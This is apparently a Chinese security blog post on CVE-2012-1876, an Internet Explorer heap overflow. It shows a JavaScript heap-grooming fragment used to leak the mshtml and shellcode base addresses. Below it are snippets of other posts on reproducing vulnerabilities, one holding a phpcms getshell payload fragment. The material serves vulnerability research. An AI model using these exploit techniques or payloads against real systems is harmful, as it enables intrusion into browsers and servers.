cve2012-1876 leak mshtml base address and leak shellcode base address

原創

2018-08-28 02:37

leak mshtml base address

leak shellcode base address

其中leak shellcode base 思路是聯合 http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003.php 這篇和

這篇 http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php

部分代碼如下

for(var i=0;i<3000;i+=4)
{
	fillbuff[i]=string_A.substr(0,125);
	fillbuff[i+1]=string_B.substr(0,125);
	fillbuff[i+2]=string_C.substr(0,125);
	fillbuff[i+3]=selob.cloneNode(true);
}


for(var i=4;i<3000;i+=12)
{
	fillbuff[i]=null;
}

發表評論

所有評論

還沒有人評論，想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.

phpstudy php_xmlrpc.dll後門漏洞復現

搭建環境： phpstudy2018 php版本5.4 漏洞影響版本：5.2/5.4 漏洞利用 1、隨便訪問一個存在的php文件我這裏就訪問index.php好了 2、進行index.php 進行抓包再自行添加兩個字段payl

加油努力拉屎放屁

2020-07-03 08:14:49

phpcms的漏洞復現

phpcmsV9.5.8後臺getshell： payload：http://127.0.0.1/index.php?m=content&c=content&a=public_categorys&menuid=${@phpinfo

加油努力拉屎放屁

2020-07-03 08:14:49

weblogic漏洞從0學習復現

這兩天慢慢復現完weblogic的漏洞 weblogic的歷史漏洞 #控制檯路徑泄露 Weakpassword #SSRF： CVE-2014-4210 #JAVA反序列化： CVE-2015-4852：Webl

加油努力拉屎放屁

2020-07-03 08:14:49

從任意文件下載漏洞到拿下多臺內網服務器權限

文章涉密部分，會進行大量打碼，敬請諒解一、從一個任意文件下載漏洞說起客戶內網系統中有一個系統上線前例行安全檢測。我接到單子之後開始整活~ 打開系統，首先看看有沒有上傳點，興沖沖找了一圈，失望而歸。不過好歹有一個文件下載的

nini_boom

2020-07-02 10:27:46

phpMyAdmin跨站點請求僞造漏洞

CVE-2019-12922 phpMyAdmin 4.9.0.1-跨站請求僞造漏洞復現 0X01 漏洞概述安全研究人員Manuel Garcia Cardenas近日公佈了最常用的管理MySQL和MariaDB數據庫的應用程

tdcoming

2020-06-30 05:42:46

[漏洞復現]Apache Solr Velocity模板遠程代碼執行

Apache Solr Velocity模板遠程代碼執行 0X00 漏洞描述近日,國外安全研究員s00py公開了一個Apache Solr的Velocity模板注入的漏洞.該漏洞可以攻擊最新版本的Solr.目前該漏洞利用詳情已

tdcoming

2020-06-30 05:42:46

蹭熱度分享一份寫配置漏洞案例

文章目錄0x00 前言0x01 分析0x02 利用0x03 結語 0x00 前言今天奇安信ATEAM團隊分享一篇深度好文這是一篇“不一樣”的真實滲透測試案例分析文章引爆朋友圈多次轉發分享，Phith0n 師傅也專門寫了一篇經典寫

Ca3tie1

2020-06-27 03:17:43

如何從Exploit-DB中添加模塊至Metasploit

如何從Exploit-DB中添加模塊至Metasploit前言1、搜索漏洞信息2、使用searchsploit進行本地搜索3、複製rb文件4、use載入模塊前言系統：Linux kali 5.2.0-kali2-amd64 #

夜会美丶

2020-06-26 21:11:33

linux -shell注入_白名單繞過

在靶機中遇到一個shell注入的腳本過段時間會有該靶機的博客發出因爲暫時不能發出什麼是OS 命令注入—— 操作系統命令注入（也稱爲shell注入）是一個Web安全漏洞，允許攻擊者在運行應用程序的服務器上執行任意操作系統（OS）命令，並

河里一只虾

2020-06-17 15:19:23

Microsoft Office公式編輯器（CVE-2017-11882）漏洞分析報告

文章目錄0x01 漏洞環境0x02 漏洞成因0x03 影響漏洞版本0x04 分析過程漏洞溢出點動態分析0x05 利用過程彈出網頁msf配置攻擊方和被攻擊方進行通訊攻擊pc445端口0x06 生成攻擊文件msf開始攻擊0x07 結果

东方二狗

2020-06-16 02:26:51

KERNEL POOL LIST ENTRY OVERWRITE ATTACK

KERNEL POOL LISTENTRY OVERWRITE ATTACK LIST_ENTRY OVERWRITE 原理圖測試代碼: Sys： VOID Nopagepool_ListEntry_Overwrite(

instruder

2020-06-15 07:52:19

MySQL報錯注入函數彙總

常用函數字符串連接函數，將多個字符串連接成一個字符串，當中間字符串有一個爲空時,最後結果也爲空 concat(str1, str2, str3 ,...) concat_ws('指定分隔符'， str1，str2，str3.

Au.J

2020-06-09 09:44:04

S2-001本地復現與分析

環境搭建：win10 eclipes ee struts2.0.1 tomcat8 導入最基礎的jar包 web.xml <?xml version="1.0" encoding="UTF-8"?> <web-app x

Au.J

2020-06-09 09:43:54

S2-045本地復現與分析

環境搭建：win10 eclipes ee struts2.3.20 tomcat8 搭建好的環境：鏈接：https://pan.baidu.com/s/1mChEMcWRlKALdu9Ikce8OQ 提取碼：uisj

Au.J

2020-06-09 09:43:54

Apache Tomcat CVE-2019-0232 遠程代碼執行漏洞

漏洞簡介2019年4月10日，Apache Tomcat報告了一個漏洞，報告中稱在windows上運行的Apache Tomcat存在遠程代碼執行漏洞，漏洞編號爲CVE-2019-0232。在Windows平臺，遠程攻擊者向CG

tdcoming

2020-06-09 03:13:40

24小時熱門文章

cve2012-1876 leak mshtml base address and leak shellcode base address

HP 3COM/H3C Intelligent Management 幾個 Luigi Auriemma發現的cve漏洞

vul_sample

CVE-2012-0758 Adobe Shockwave Player Parsing cupt atom heap overflow

KERNEL POOL LIST ENTRY OVERWRITE ATTACK

一頓飯喫一兩斤肉和一頓飯喫幾百斤肉

Mac下配置sublime實現LaTeX

https://yachay.unat.edu.pe/blog/index.php?comment_area=format_blog&comment_component=blog&comment_co

linux以太網驅動總結